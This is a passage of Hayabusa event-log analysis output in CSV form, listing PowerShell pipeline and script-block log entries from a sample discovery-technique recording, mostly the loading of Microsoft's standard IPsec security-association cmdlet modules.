value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): 
""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if 
($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeSA ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if 
($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() 
} } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper 
-is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 
+09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecQuickModeSA ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] 